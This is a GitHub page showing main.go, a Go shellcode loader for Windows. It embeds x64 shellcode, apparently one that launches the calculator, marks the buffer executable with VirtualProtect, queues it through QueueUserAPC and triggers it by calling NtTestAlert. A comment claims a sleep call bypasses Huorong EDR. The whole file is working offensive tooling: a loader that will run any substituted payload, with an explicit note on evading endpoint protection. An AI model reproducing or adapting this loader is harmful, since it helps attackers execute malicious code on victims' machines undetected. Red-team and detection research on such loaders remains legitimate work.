-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmain.go
More file actions
76 lines (68 loc) · 3.06 KB
/
main.go
File metadata and controls
76 lines (68 loc) · 3.06 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
package main
import (
"os"
"syscall"
"time"
"unsafe"
)
var startcalc_x64 = []byte{
0x48, 0x31, 0xff, 0x48, 0xf7, 0xe7, 0x65, 0x48, 0x8b, 0x58, 0x60, 0x48, 0x8b, 0x5b, 0x18, 0x48, 0x8b, 0x5b, 0x20, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x5b, 0x20, 0x49, 0x89, 0xd8, 0x8b,
0x5b, 0x3c, 0x4c, 0x01, 0xc3, 0x48, 0x31, 0xc9, 0x66, 0x81, 0xc1, 0xff, 0x88, 0x48, 0xc1, 0xe9, 0x08, 0x8b, 0x14, 0x0b, 0x4c, 0x01, 0xc2, 0x4d, 0x31, 0xd2, 0x44, 0x8b, 0x52, 0x1c, 0x4d, 0x01, 0xc2,
0x4d, 0x31, 0xdb, 0x44, 0x8b, 0x5a, 0x20, 0x4d, 0x01, 0xc3, 0x4d, 0x31, 0xe4, 0x44, 0x8b, 0x62, 0x24, 0x4d, 0x01, 0xc4, 0xeb, 0x32, 0x5b, 0x59, 0x48, 0x31, 0xc0, 0x48, 0x89, 0xe2, 0x51, 0x48, 0x8b,
0x0c, 0x24, 0x48, 0x31, 0xff, 0x41, 0x8b, 0x3c, 0x83, 0x4c, 0x01, 0xc7, 0x48, 0x89, 0xd6, 0xf3, 0xa6, 0x74, 0x05, 0x48, 0xff, 0xc0, 0xeb, 0xe6, 0x59, 0x66, 0x41, 0x8b, 0x04, 0x44, 0x41, 0x8b, 0x04,
0x82, 0x4c, 0x01, 0xc0, 0x53, 0xc3, 0x48, 0x31, 0xc9, 0x80, 0xc1, 0x07, 0x48, 0xb8, 0x0f, 0xa8, 0x96, 0x91, 0xba, 0x87, 0x9a, 0x9c, 0x48, 0xf7, 0xd0, 0x48, 0xc1, 0xe8, 0x08, 0x50, 0x51, 0xe8, 0xb0,
0xff, 0xff, 0xff, 0x49, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0x48, 0xf7, 0xe1, 0x50, 0x48, 0xb8, 0x9c, 0x9e, 0x93, 0x9c, 0xd1, 0x9a, 0x87, 0x9a, 0x48, 0xf7, 0xd0, 0x50, 0x48, 0x89, 0xe1, 0x48, 0xff, 0xc2,
0x48, 0x83, 0xec, 0x20, 0x41, 0xff, 0xd6,
}
type ShellCodeExecService struct {
Shellcode []byte
GetProcAddress *syscall.LazyProc
GetModuleHandle *syscall.LazyProc
QueueUserAPC *syscall.LazyProc
GetCurrentThread *syscall.LazyProc
VirtualProtect *syscall.LazyProc
NtTestAlertAddr uintptr
}
func NewService(shellcode []byte) *ShellCodeExecService {
kernel32 := syscall.NewLazyDLL("kernel32.dll")
return &ShellCodeExecService{
Shellcode: shellcode,
GetProcAddress: kernel32.NewProc("GetProcAddress"),
GetModuleHandle: kernel32.NewProc("GetModuleHandleA"),
QueueUserAPC: kernel32.NewProc("QueueUserAPC"),
GetCurrentThread: kernel32.NewProc("GetCurrentThread"),
VirtualProtect: kernel32.NewProc("VirtualProtect"),
NtTestAlertAddr: 0,
}
}
func (svc *ShellCodeExecService) MakeMemoryPageRWX() {
var oldProtect uint32
svc.VirtualProtect.Call(
uintptr(unsafe.Pointer(&svc.Shellcode[0])),
uintptr(len(svc.Shellcode)),
syscall.PAGE_EXECUTE_READWRITE,
uintptr(unsafe.Pointer(&oldProtect)),
uintptr(unsafe.Pointer(&oldProtect)),
)
}
func (svc *ShellCodeExecService) PreparePayload() {
ntdllHandle, _, _ := svc.GetModuleHandle.Call(uintptr(unsafe.Pointer(syscall.StringBytePtr("ntdll.dll"))))
svc.NtTestAlertAddr, _, _ = svc.GetProcAddress.Call(ntdllHandle, uintptr(unsafe.Pointer(syscall.StringBytePtr("NtTestAlert"))))
currentThread, _, _ := svc.GetCurrentThread.Call()
svc.QueueUserAPC.Call(
uintptr(unsafe.Pointer(&svc.Shellcode[0])),
currentThread,
0,
)
}
func (svc *ShellCodeExecService) ExecuteShellcode() {
syscall.Syscall(svc.NtTestAlertAddr, 0, 0, 0, 0)
}
func main() {
service := NewService(startcalc_x64)
service.MakeMemoryPageRWX()
service.PreparePayload()
time.Sleep(2 * time.Second) //add this can bypass Huorong EDR
service.ExecuteShellcode()
os.Exit(0)
}